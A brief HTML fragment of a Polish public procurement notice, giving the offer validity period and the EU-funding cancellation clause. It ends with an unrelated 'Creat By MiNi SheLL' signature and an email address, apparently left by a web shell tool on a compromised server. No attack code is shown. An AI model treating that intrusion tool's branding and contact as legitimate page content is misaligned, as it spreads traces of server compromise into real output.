<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com